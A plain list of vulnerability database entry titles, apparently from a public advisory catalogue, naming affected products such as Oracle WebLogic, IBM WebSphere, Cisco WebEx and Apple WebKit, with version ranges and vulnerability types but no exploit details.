[112651] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Administrative Console privilege escalation
[112589] Apple macOS up to 10.13.3 WebKit memory corruption
[112588] Apple macOS up to 10.13.3 WebKit memory corruption
[112587] Apple macOS up to 10.13.3 WebKit memory corruption
[112500] IBM Jazz Foundation 6.0.x Web UI cross site scripting
[112492] IBM Cognos TM1 10.2/10.2.2 Web UI cross site scripting
[112444] CMS Made Simple 2.2.5 moduleinterface.php cross site scripting
[112443] CMS Made Simple 2.2.5 moduleinterface.php cross site scripting
[112418] Advantech WebAccess SCADA up to 8.2 directory traversal
[112417] Advantech WebAccess SCADA up to 8.2 sql injection
[112368] Affiligator Affiliate Webshop Management System 2.1.0 search/ sql injection
[112338] Symantec Reporter up to 9.5.4.0/10.1 Management Interface weak authentication
[112290] Moodle 3.x Quiz Web Services Result information disclosure
[112222] Cisco WebEx Meetings Server information disclosure
[112221] Cisco WebEx Meetings Server Disabled Account 7PK Security Features
[112220] Cisco WebEx Meetings Server information disclosure
[112219] Cisco WebEx Meetings Server XML External Entity
[112216] Cisco Unified Communications Manager Web Framework information disclosure
[112204] Cisco NX-OS 7.3.2 Management Interface denial of service
[112087] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime SEC privilege escalation
[112086] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime SEC privilege escalation
[112046] Oracle Hospitality Labor Management 8.5.1/9.0.0 Webservice Endpoint privilege escalation
[112031] Oracle WebCenter Sites 11.1.1.8.0 Advanced UI information disclosure
[112029] Oracle WebLogic Server 12.1.3.0.0/12.2.1.2.0/12.2.1.3.0 Web Services information disclosure
[112028] Oracle HTTP Server Web Listener denial of service
[112026] Oracle Access Manager 10.1.4.3.0 Web Server Plugin information disclosure
[112025] Oracle Access Manager 11.1.2.3.0 Web Server Plugin information disclosure
[112023] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Security Framework weak encryption
[112022] Oracle HTTP Server Web Listener memory corruption
[112018] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 WebCenter Spaces Application privilege escalation
[112017] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Apache Struts 1 privilege escalation
[112016] Oracle WebCenter Content 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Content Server privilege escalation
[112015] Oracle WebCenter Content 11.1.1.9.0 Content Server privilege escalation
[112012] Oracle Business Intelligence Enterprise Edition 12.2.1.3.0 Analytics Web Dashboards privilege escalation
[112008] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.2.0/12.2.1.3.0 Sample Apps privilege escalation
[112007] Oracle iPlanet Web Server 7.0 NSS memory corruption
[112005] Oracle WebLogic Server 12.2.1.3.0 WLS Web Services privilege escalation
[111999] Oracle Financial Services Profitability Management 6.1.x/8.0.x User Interface privilege escalation
[111998] Oracle Financial Services Price Creation/Discovery 8.0.5 User Interface privilege escalation
[111997] Oracle Financial Services Market Risk Measurement 8.0.5 User Interface privilege escalation
[111996] Oracle Financial Services Market Risk 8.0.x User Interface privilege escalation
[111995] Oracle Financial Services Loan Loss Forecasting 8.0.x User Interface privilege escalation
[111994] Oracle Financial Services Liquidity Risk Management 8.0.x User Interface privilege escalation
[111993] Oracle Financial Services Hedge Management 8.0.x User Interface privilege escalation
[111992] Oracle Financial Services Funds Transfer Pricing 6.1.x/8.0.x User Interface privilege escalation
[111991] Oracle Financial Services Balance Sheet Planning 8.0.x User Interface privilege escalation
[111990] Oracle Financial Services Asset Liability Management 6.1.x/8.0.x User Interface privilege escalation
[111989] Oracle 8.0.x User Interface privilege escalation
[111945] Asus Router AsusWRT-Merlin router/httpd/web.c ej_update_variables memory corruption
[111849] WordPress weblizar-pinterest-feeds Plugin 1.1.1 Plugin 1.1 wp-admin/admin-ajax.php cross site request forgery
[111848] weblizar-pinterest-feeds Plugin 1.1.1 on WordPress wp-admin/admin-ajax.php cross site scripting
[111847] weblizar-pinterest-feeds Plugin 1.1.1 on WordPress wp-admin/admin-ajax.php cross site scripting
[111846] weblizar-pinterest-feeds Plugin 1.1.1 on WordPress wp-admin/admin-ajax.php cross site scripting
[111803] Advantech WebAccess up to 8.2 File Upload privilege escalation
[111802] Advantech WebAccess up to 8.2 memory corruption
[111775] IBM WebSphere Portal 8.5/9.0 Web UI cross site scripting
[111771] IBM Curam Social Program Management 6.0.5/6.1.1/6.2.0/7.0.1/7.0.2 Web UI cross site scripting
[111770] IBM Curam Social Program Management 6.0.5/6.1.1/6.2.0/7.0.1 Web UI cross site scripting
[111767] TP-LINK WVR/WAR/ER webfilter.lua privilege escalation
[111752] TP-LINK WVR/WAR/ER interface_wan.lua privilege escalation
[111748] TP-LINK WVR/WAR/ER interface_wan.lua privilege escalation
[111705] IBM QRadar 7.2/7.3 Web UI cross site scripting
[111697] IBM Security Access Manager 9.0.3 Web UI cross site scripting
[111562] Microsoft SharePoint Server 2010/2013/2016 Web Request privilege escalation
[111561] Microsoft SharePoint Server 2010/2013/2016 Web Request privilege escalation
[111405] Advantech WebAccess up to 8.2 privilege escalation
[111404] Advantech WebAccess up to 8.2 denial of service
[111403] Advantech WebAccess up to 8.2 memory corruption
[111402] Advantech WebAccess up to 8.2 directory traversal
[111401] Advantech WebAccess up to 8.2 sql injection
[111345] Cisco WebEx Network Recording Player ARF Player privilege escalation
[111335] IBM Tivoli Key Lifecycle Manager 2.5/2.6/2.7 Web UI cross site scripting
[111324] BEA WebLogic 3.1.8/4.0.4/4.5.1 privilege escalation
[111323] pfSense up to 2.4.2 WebGUI csrf-magic.php privilege escalation
[111287] Plone 2.5-5.1rc1 Web Template str.format privilege escalation
[111277] EmbedThis GoAhead Webserver 4.0.0 CGI denial of service
[111276] EmbedThis GoAhead Webserver up to 4.0.0 HTTP Listener memory corruption
[111268] IBM WebSphere MQ 8.0/9.0 Channel Process privilege escalation
[111210] Trustwave Secure Web Gateway up to 11.8.0.27 SSH Key /sendKey Key Management Error
[111207] Webmin up to 1.869 custom/run.cgi cross site scripting
[111130] Apple tvOS up to 11.1 WebKit memory corruption
[111128] Apple iCloud up to 7.1 on Windows WebKit memory corruption
[111041] IBM WebSphere Portal 7.0/8.0/8.5/9.0 Error Message information disclosure
[110925] IBM 10.0.0 Web UI cross site scripting
[110881] IBM Business Process Manager 8.5 Web UI cross site scripting
[110791] IBM WebSphere 8.5/9.0 information disclosure
[110683] Python up to 3.6.3 URL Lib/webbrowser.py privilege escalation
[110672] Fortinet FortiOS up to 5.2/5.4.2/5.6.2 SSL VPN Web Portal Session information disclosure
[110652] IBM iNotes Web UI cross site scripting
[110612] CMS Auditor Website 1.0 /news-detail sql injection
[110597] Website Auction Marketplace 2.0.5 search.php sql injection
[110555] Western Digital MyCloud PR4100 2.30.172 Web Administration multi_uploadify.php weak authentication
[110552] Microsoft SharePoint Enterprise Server 2016 Web Request privilege escalation
[110549] Microsoft Exchange Server 2016 CU6/2016 CU7 Outlook Web Access privilege escalation
[110496] IBM Connections Engagement Center 6.0 Web UI cross site scripting
[110494] IBM Sterling File Gateway 2.2 Web UI cross site scripting
[110491] Palo Alto PAN-OS up to 6.1.18/7.0.18/7.1.13/8.0.5 Management Interface privilege escalation
[110489] Palo Alto PAN-OS up to 6.1.18/7.0.18/7.1.13/8.0.5 Management Interface denial of service
[110482] IBM Sterling File Gateway 2.2 Web UI cross site scripting
[110480] IBM WebSphere Portal 7.0/8.0/8.5/9.0 cross site scripting
[110334] IBM Connections 5.5 Web UI cross site scripting
[110331] IBM Sterling B2B Integrator Standard Edition 5.2 Web UI cross site scripting
[110327] IBM WebSphere MQ 7.5/8.0/9.0 RFH Header Data Processing Error
[110321] IBM WebSphere MQ 8.0/9.0 privilege escalation
[110188] Artica Web Proxy 3.06.112216 freeradius.users.php privilege escalation
[110103] Splunk Enterprise up to 6.3.11/6.4.8/6.5.5/6.6.3.1/7.0.0.0 Web Impersonation privilege escalation
[110099] Cisco WebEx Network Recording Player ARF/WRF File memory corruption
[110098] Cisco WebEx Network Recording Player ARF/WRF File memory corruption
[110097] Cisco WebEx Network Recording Player ARF/WRF File memory corruption
[110096] Cisco WebEx Network Recording Player ARF/WRF File information disclosure
[110095] Cisco WebEx Network Recording Player ARF/WRF File memory corruption
[110094] Cisco WebEx Network Recording Player ARF/WRF File privilege escalation
[110093] Cisco WebEx Meeting Center cross site scripting
[110092] Cisco WebEx Event Center information disclosure
[110090] Cisco WebEx Meeting Server Welcome Message privilege escalation
[110087] Cisco WebEx Network Recording Player WRF Player denial of service
[110086] Cisco WebEx Network Recording Player ARF Player memory corruption
[110056] Cisco WebEx Meeting Center Access Control privilege escalation
[110047] Fortinet FortiOS 5.0/5.2.12/5.4.6/5.6.2 Web Portal cross site scripting
[110006] IBM WebSphere Commerce Enterprise 7.0/8.0 information disclosure
[110002] IBM WebSphere MQ 8.0/9.0 denial of service
[109979] TP-LINK TL-WVR/TL-WAR/TL-ER/TL-R uhttpd interface.lua get_device_byif privilege escalation
[109778] Open Ticket Request System up to 3.3.19/4.0.25/5.0.23 Agent Interface Spelling.pm privilege escalation
[109668] VMware vSphere Web Client up to 5.5/6.0 cross site request forgery
[109651] Moxa EDS-G512E 5.1 Build 16072215 Administration Interface cross site scripting
[109457] Cisco Web Security Appliance Advanced Malware Protection privilege escalation
[109456] Cisco Unified Communications Manager SQL Database Interface sql injection
[109427] PSFTPd 10.0.4 Build 729 Graphical User Interface privilege escalation
[109316] Schneider Electric InduSoft Web Studio/InTouch Machine Edition up to 8.0 SP2 Patch 1 memory corruption
[109171] TinyWebGallery 2.4 cross site scripting
[109157] Siemens SIMATIC PCS 7 up to 8.1 DCOM Interface privilege escalation
[109156] Advantech WebAccess up to 8.2 memory corruption
[109153] Advantech WebAccess up to 8.2 denial of service
[108907] Cisco WebEx Meetings Server HTTP Header Reply information disclosure
[108898] Cisco Prime Collaboration Provisioning up to 12.2 SQL Database Interface privilege escalation
[108879] IBM InfoSphere Bigesights 4.2.0/4.2.5 Web UI cross site scripting
[108860] Intel McAfee Network Data Loss Prevention 9.3.x Webserver information disclosure
[108738] Fortinet FortiOS up to 5.6.0 WebUI cross site scripting
[108711] Fortinet FortiOS up to 5.4.5 Web API privilege escalation
[108642] IBM Tivoli Endpoint Manager 9.2/9.5 Web UI cross site scripting
[108619] IBM Jazz Foundation Web UI cross site scripting
[108607] IBM WebSphere Application Server 3.13 JSF information disclosure
[108587] Cisco WebEx Meetings Server up to 1.0 Entropy weak encryption
[108513] Apple tvOS up to 10.2.2 WebKit cross site scripting
[108512] Apple tvOS up to 10.2.2 WebKit information disclosure
[108511] Apple tvOS up to 10.2.2 WebKit memory corruption
[108510] Apple tvOS up to 10.2.2 WebKit memory corruption
[108509] Apple tvOS up to 10.2.2 WebKit memory corruption
[108508] Apple tvOS up to 10.2.2 WebKit memory corruption
[108507] Apple tvOS up to 10.2.2 WebKit memory corruption
[108506] Apple tvOS up to 10.2.2 WebKit memory corruption
[108505] Apple tvOS up to 10.2.2 WebKit memory corruption
[108504] Apple tvOS up to 10.2.2 WebKit memory corruption
[108503] Apple tvOS up to 10.2.2 WebKit memory corruption
[108502] Apple tvOS up to 10.2.2 WebKit memory corruption
[108501] Apple tvOS up to 10.2.2 WebKit memory corruption
[108500] Apple tvOS up to 10.2.2 WebKit memory corruption
[108499] Apple tvOS up to 10.2.2 WebKit memory corruption
[108498] Apple tvOS up to 10.2.2 WebKit memory corruption
[108497] Apple tvOS up to 10.2.2 WebKit memory corruption
[108496] Apple tvOS up to 10.2.2 WebKit memory corruption
[108495] Apple tvOS up to 10.2.2 WebKit memory corruption
[108291] FiberHome Router /cgi-bin/webproc directory traversal
[108290] Webmin up to 1.859 File Manager cross site scripting
[108289] Webmin 1.850 at/create_job.cgi cross site request forgery
[108288] Webmin 1.850 tunnel/link.cgi privilege escalation
[108274] Cisco WebEx Meetings Server denial of service
[108263] Cisco Cloud Services Platform 2100 2.1.0 Web Console privilege escalation
[108168] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Web privilege escalation
[108139] Oracle Hospitality Cruise Fleet Management 9.0.2.0 GangwayActivityWebApp privilege escalation
[108134] Oracle Hospitality Suite8 8.10.1/8.10.2 WebConnect information disclosure
[108130] Oracle Hospitality Guest Access 4.2.0/4.2.1 Interface information disclosure
[108125] Oracle Hospitality Cruise Fleet Management 9.0.2.0 GangwayActivityWebApp privilege escalation
[108123] Oracle Hospitality Suite8 8.10.1/8.10.2 WebConnect information disclosure
[108119] Oracle Hospitality Suite8 8.10.1/8.10.2 WebConnect information disclosure
[108111] Oracle Hospitality Suite8 8.10.1/8.10.2 WebConnect privilege escalation
[108098] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.1.0/12.2.1.2.0 Web Container information disclosure
[108097] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.1.0/12.2.1.2.0 Web Container privilege escalation
[108096] Oracle HTTP Server 11.1.1.9.0/12.1.3.0.0 Web Listener information disclosure
[108095] Oracle Access Manager 11.1.2.3.0 Web Server Plugin information disclosure
[108094] Oracle GlassFish Server 3.1.2 Administration Graphical User Interface privilege escalation
[108092] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.1.0/12.2.1.2.0 WLS-WebServices privilege escalation
[108091] Oracle HTTP Server Web Listener weak encryption
[108089] Oracle GlassFish Server 3.0.1/3.1.2 Web Container privilege escalation
[108088] Oracle GlassFish Server 3.0.1/3.1.2 Web Container privilege escalation
[108087] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Analytics Web General privilege escalation
[108086] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0 Web Container information disclosure
[108077] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0 Web Service API information disclosure
[108076] Oracle Access Manager 11.1.2.3.0 Web Server Plugin information disclosure
[108075] Oracle WebCenter Content 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Content Server privilege escalation
[108072] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Analytics Web General privilege escalation
[108063] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.1.0/12.2.1.2.0 WLS Security privilege escalation
[108046] Oracle Knowledge Management up to 12.2.7 User Interface privilege escalation
[108045] Oracle Knowledge Management up to 12.2.7 User Interface privilege escalation
[108032] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 libcurl information disclosure
[108031] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Postgresql race condition
[108030] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Wireshark denial of service
[108029] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 file denial of service
[108026] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Gson privilege escalation
[108023] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Kerberos Numeric Error
[108022] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Xalan privilege escalation
[108021] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 BeanUtils privilege escalation
[108017] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 OpenSSL weak encryption
[108016] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Spring cross site request forgery
[108015] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Commons Collections privilege escalation
[108014] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 glibc Ghost memory corruption
[108013] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Groovy privilege escalation
[107816] QEMU up to 2.10.0 io/channel-websock.c denial of service
[107607] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 HTTP Response Splitting cross site scripting
[107499] IniNet Webserver up to 2.02 weak authentication
[107488] Cisco Unified Communications Manager Web UI cross site scripting
[107487] Cisco WebEx Meetings Server cross site scripting
[107416] Gemalto HASP SRM/Sentinel HASP/Sentinel LDK up to 7.54 Admin Interface privilege escalation
[107410] IBM WebSphere Message Broker 9.0/10.0 information disclosure
[107378] IBM WebSphere Commerce 7.0/8.0 Marketing ESpot denial of service
[107352] Schneider Electric InduSoft Web Studio/InTouch Machine Edition up to 8.0 SP2 weak authentication
[107222] IBM WebSphere DataPower up to 7.6 Web UI cross site scripting
[107221] IBM WebSphere Portal 7.0/8.0/8.5/9.0 directory traversal
[107169] IBM Business Process Manager 7.5/8.0/8.5 Web UI cross site scripting
[107168] IBM Business Process Manager 7.5/8.0/8.5 Web UI cross site scripting
[107160] Citrix Netscaler Application Delivery Controller up to <=10.0 Management Interface privilege escalation
[107159] IBM Business Process Manager 8.0.1.1/8.5.7 Web UI cross site scripting
[107145] Schneider Electric U.motion Builder up to 1.2.1 Web Service weak authentication
[107114] IBM Business Process Manager 8.5.7 Web UI cross site scripting
[107109] IBM WebSphere MQ 8.0 privilege escalation
[107097] Zope/Plone Management Interface cross site request forgery
[107013] Trend Micro Web Security 6.5 Web Service Inspection privilege escalation
[107010] EMC ViPR SRM/Storage M/R/VNX M/R/M/R Webservice Gateway directory traversal
[106910] Watchguard Firewall up to 11.x XML-RPC Interface denial of service
[106909] Watchguard Firewall up to 11.x XML-RPC Interface cross site scripting
[106853] SAP NetWeaver AS JAVA up to 7.5 Host Control Web Service denial of service
[106843] Ruby up to 2.2.8/2.3.4/2.4.0 WEBrick Library weak authentication
[106831] Cisco Cloud Web Security up to 3.0.1.6 Filter memory corruption
[106685] webapp-builder 2.0 on WordPress Invedion CMS Unlicensed privilege escalation
[106567] D-Link DIR-850L up to FW114WWb07_h2ab_beta1 htdocs/web/wandetect.php cross site scripting
[106565] D-Link DIR-850L up to FW114WWb07_h2ab_beta1 htdocs/web/shareport.php cross site scripting
[106564] D-Link DIR-850L up to FW114WWb07_h2ab_beta1 htdocs/web/wpsacts.php cross site scripting
[106544] Microsoft Exchange Server 2016 Outlook Web Access cross site scripting
[106419] Jenkins up to 1.585 on Tomcat Session Cookie WebAppMain.java' 7PK Security Features
[106418] Jenkins up to 1.585 on Tomcat Session Cookie WebAppMain.java' Flag 7PK Security Features
[106214] Cisco Unity Connection 10.5(2) Web Framework Reflected cross site scripting
[106212] IBM Emptoris Supplier Lifecycle Management 10.1.0.x Web UI cross site scripting
[106181] T&W WIFI Repeater BE126 cgi-bin/webupg privilege escalation
[106175] Mongoose Web Server up to 6.8 _mg_admin cross site request forgery
[106169] IBM WebSphere Portal 6.1/7.0/8.0 cross site scripting
[106130] IBM QRadar Network Security 5.4 Web UI cross site scripting
[106113] Palo Alto PAN-OS up to 6.1.17/7.0.16/7.1.11/8.0.2 GlobalProtect Interface cross site scripting
[105990] Advantech WebAccess up to 8.2 sql injection
[105989] Advantech WebAccess up to 8.2 memory corruption
[105988] Advantech WebAccess up to 8.2 memory corruption
[105987] Advantech WebAccess up to 8.2 memory corruption
[105986] Advantech WebAccess up to 8.2 Format String
[105985] Advantech WebAccess up to 8.2 weak authentication
[105956] IBM Cognos Analytics 11.0 Web UI cross site scripting
[105955] IBM Cognos Analytics 11.0 Web UI cross site scripting
[105953] IBM Cognos Analytics 11.0 Web UI cross site scripting
[105852] Webcalendar up to 1.2.7 directory traversal
[105851] Webcalendar up to 1.2.7 cross site scripting
[105836] IBM Curam Social Program Management 6.0/6.1/6.2/7.0 Web UI cross site scripting
[105759] OSIsoft PI Web API up to 1.8.x cross site request forgery
[105750] SpiderControl SCADA Web Server directory traversal
[105619] Web-Dorado Photo Gallery by WD - Responsive Photo Gallery up to 1.3.50 on WordPress photo-gallery.php bwg_edit_tag sql injection
[105470] IBM WebSphere Application Server 8.0/8.5/9.0 Web Services Security information disclosure
[105422] Cisco Web Security Appliance SNMP Polling information disclosure
[105394] Cisco AnyConnect Secure Mobility Client WebLaunch cross site scripting
[105213] IBM InfoSphere Streams 4.0/4.1/4.2 Web UI cross site scripting
[105152] IBM Emptoris Supplier Lifecycle Management 10.0.x/10.1.x Web UI cross site scripting
[105127] Express Web Framework up to 3.10/4.4 on Node.js 400 Level Response cross site scripting
[104993] Oracle Hospitality WebSuite8 Cloud Service 8.9.6/8.10.x privilege escalation
[104904] Cisco Unified Communications Manager 11.5(1.10000.6) Web Framework directory traversal
[104902] Cisco Prime Collaboration Provisioning Tool up to 12.2 Web UI cross site request forgery
[104812] IBM WebSphere Application Server 9.0.0.4 PasswordUtil 7PK Security Features
[104811] IBM iNotes 8.5/9.0 Web UI cross site scripting
[104808] IBM Infosphere Master Data Management Server up to 11.6 Web UI cross site scripting
[104749] IBM WebSphere MQ Internet Pass-Thru 2.0/2.1 MQIPT Stop 7PK Security Features
[104711] IBM Sterling B2B Integrator Standard Edition 5.2.x Web UI cross site scripting
[104675] IBM InfoSphere Master Data Management up to 11.6 Web UI cross site scripting
[104672] IBM Infosphere Master Data Management Server 11.0/11.3/11.4/11.5/11.6 Web UI cross site scripting
[104470] Cisco Cloud Web Security Alert Service cross site scripting
[104460] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Web UI cross site scripting
[104455] IBM Emptoris Supplier Lifecycle Management 10.1.0.x Web UI cross site scripting
[104382] Palo Alto PAN-OS up to 6.1.17/7.0.15/7.1.10/8.0.2 GlobalProtect External Interface cross site scripting
[104331] Cisco Prime Collaboration Provisioning Tool 12.1 Web Portal cross site scripting
[104330] Cisco Web Security Appliance 9.0.0-485/10.1.0-204 Web Proxy ACL privilege escalation
[104329] Cisco Web Security Appliance 10.1.0-204 Web GUI Credentials privilege escalation
[104328] Cisco Web Security Appliance 10.1.0-204 cross site scripting
[104285] Apple iCloud up to 6.2.1 on Windows WebKit Web Inspector memory corruption
[104284] Apple iCloud up to 6.2.1 on Windows WebKit Page Loading memory corruption
[104282] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption
[104281] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption
[104280] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption
[104279] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption
[104278] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption
[104277] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption
[104276] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption
[104275] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption
[104274] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption
[104273] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption
[104272] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption
[104271] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption
[104270] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption
[104269] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption
[104268] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption
[104267] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption
[104266] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption
[104200] Apple tvOS up to 10.2.1 WebKit Page Loading memory corruption
[104199] Apple tvOS up to 10.2.1 WebKit memory corruption
[104198] Apple tvOS up to 10.2.1 WebKit cross site scripting
[104197] Apple tvOS up to 10.2.1 WebKit cross site scripting
[104196] Apple tvOS up to 10.2.1 WebKit memory corruption
[104195] Apple tvOS up to 10.2.1 WebKit memory corruption
[104194] Apple tvOS up to 10.2.1 WebKit memory corruption
[104193] Apple tvOS up to 10.2.1 WebKit memory corruption
[104192] Apple tvOS up to 10.2.1 WebKit memory corruption
[104191] Apple tvOS up to 10.2.1 WebKit memory corruption
[104190] Apple tvOS up to 10.2.1 WebKit memory corruption
[104189] Apple tvOS up to 10.2.1 WebKit memory corruption
[104188] Apple tvOS up to 10.2.1 WebKit memory corruption
[104187] Apple tvOS up to 10.2.1 WebKit memory corruption
[104186] Apple tvOS up to 10.2.1 WebKit memory corruption
[104185] Apple tvOS up to 10.2.1 WebKit memory corruption
[104184] Apple tvOS up to 10.2.1 WebKit memory corruption
[104183] Apple tvOS up to 10.2.1 WebKit memory corruption
[104182] Apple tvOS up to 10.2.1 WebKit memory corruption
[104181] Apple tvOS up to 10.2.1 WebKit memory corruption
[104180] Apple tvOS up to 10.2.1 WebKit 7PK Time and State
[104094] IBM Tivoli Endpoint Manager Web UI Lifecycle/Power/Patch cross site scripting
[104001] Oracle up to 16.2 Web Access privilege escalation
[103999] Oracle 8.3/8.4/15.1/15.2/16.1 Web Access privilege escalation
[103998] Oracle up to 16.2 Web Access privilege escalation
[103997] Oracle 15.1/15.2/16.1/16.2 Web Access privilege escalation
[103950] Oracle Hospitality WebSuite8 Cloud Service 8.9.6/8.10.x General privilege escalation
[103949] Oracle Hospitality Suite8 8.10.x WebConnect privilege escalation
[103945] Oracle Hospitality Suite8 8.10.x WebConnect privilege escalation
[103944] Oracle Hospitality Property Interfaces 8.10.x Parser privilege escalation
[103938] Oracle Hospitality WebSuite8 Cloud Service 8.9.6/8.10.x privilege escalation
[103866] Oracle Transportation Management 6.1/6.2 Apache Webserver information disclosure
[103861] Oracle Agile PLM 9.3.5/9.3.6 Web Client privilege escalation
[103828] Oracle WebLogic Server 12.1.3.0 Web Container privilege escalation
[103827] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.1/12.2.1.2 Web Services privilege escalation
[103826] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.1/12.2.1.2 Core Components privilege escalation
[103821] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.1/12.2.1.2 Web Container privilege escalation
[103819] Oracle Business Intelligence Enterprise Edition 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Analytics Web Administration privilege escalation
[103814] Oracle BI Publisher 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Web Server privilege escalation
[103812] Oracle WebCenter Content 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Content Server privilege escalation
[103811] Oracle WebCenter Content 11.1.1.9.0/12.2.1.1.0 Content Server privilege escalation
[103807] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0 Web Server privilege escalation
[103806] Oracle BI Publisher 11.1.1.7.0 Web Server privilege escalation
[103805] Oracle BI Publisher 11.1.1.7.0 Web Server privilege escalation
[103804] Oracle BI Publisher 11.1.1.7.0 Web Server privilege escalation
[103799] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.1/12.2.1.2 privilege escalation
[103789] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.1/12.2.1.2 Struts 2 privilege escalation
[103786] Oracle WebLogic Server 10.3.6.0/12.1.3.0 JNDI privilege escalation
[103771] cPanel up to <=56.0.50 WHM Upload Locale Interface cross site scripting
[103714] CMS Made Simple 2.2.2 moduleinterface.php. privilege escalation
[103713] CMS Made Simple 2.2.2 moduleinterface.php. privilege escalation
[103696] Cisco WebEx Browser Extension up to 1.0.11 on Chrome/Firefox memory corruption
[103595] Oracle GlassFish Server Open Source Edition 3.0.1 Build 22 Administration Interface Credentials weak authentication
[103550] EMC ViPR SRM up to 4.0 Webservice Gateway/RMI JMX weak authentication
[103529] Juniper ScreenOS Web UI cross site scripting
[103528] Juniper ScreenOS Web UI cross site scripting
[103527] Juniper ScreenOS Web UI cross site scripting
[103526] Juniper ScreenOS Web UI cross site scripting
[103525] Juniper ScreenOS Web UI cross site scripting
[103481] IBM WebSphere MQ 9.0.1/9.0.2 Message privilege escalation
[103395] Cisco Identity Services Engine 2.1(102.101)/2.2(0.283)/2.3(0.151) Web-UI Stored cross site scripting
[103385] IBM WebSphere Commerce 6.0/7.0/8.0 Redirect
[103384] IBM WebSphere MQ 9.0.1/9.0.2 Java JMS Application Credentials privilege escalation
[103285] Yaws Web Server 1.91 Port 8080 Service directory traversal
[103278] IBM WebSphere MQ 9.0.2 Channel Status privilege escalation
[103132] IBM Security Guardium 10.0/10.1 Web UI cross site scripting
[103129] IBM Maximo Asset Management 7.1/7.5/7.6 Web UI cross site scripting
[103122] IBM Jazz Reporting Service 5.0/6.0 Web UI cross site scripting
[103058] IBM Jazz Foundation Reporting Service 5.0/6.0 Web UI cross site scripting
[103057] IBM Jazz Foundation Reporting Service 5.0/6.0 Web UI cross site scripting
[103056] IBM Jazz Foundation Reporting Service 5.0/6.0 Web UI cross site scripting
[103055] IBM Jazz Foundation Reporting Service 5.0/6.0 Web UI cross site scripting
[103026] Cisco Prime Infrastructure Web Framework cross site scripting
[103025] Cisco Prime Infrastructure 3.1(0.0) Web Framework cross site scripting
[103022] Cisco FirePOWER Management Center 6.0.1.3/6.2.1 Web Framework cross site scripting
[103021] Cisco FirePOWER Management Center up to 5.4.1.6 Web Framework Stored cross site scripting
[103020] Cisco FirePOWER Management Center up to 5.4.1.6 Web Framework cross site scripting
[103017] Cisco Prime Collaboration Provisioning 12.1 Web Application File directory traversal
[103016] Cisco Prime Collaboration Provisioning 12.1 Web Application Hijacking weak authentication
[103011] Cisco Prime Infrastructure/Programmable Network Manager 2.0(4.0.45B)/3.1(1) SQL Database Interface sql injection
[103008] Webmin 1.840 acl/save_user.cgi cross site scripting
[103007] Webmin 1.840 change_referers.cgi cross site scripting
[103006] Webmin 1.840 man/view_man.cgi cross site scripting
[103002] Request Tracker up to 4.0.24/4.2.13/4.4.1 Dashboard Subscription Interface privilege escalation
[102942] Schneider Electric Modicon M241/Modicon M251 up to 4.0.5.10 Web Application Random weak encryption
[102901] IBM WebSphere Portal 8.5/9.0 cross site scripting
[102900] IBM Curam Social Program Management 5.2/6.0/7.0 Web UI cross site scripting
[102892] FFmpeg up to 2.8.11/3.0.7/3.1.7/3.2.4/3.3.0 libavcodec/webp.c vp8_decode_mb_row_no_filter/pred8x8_128_dc_8_c memory corruption
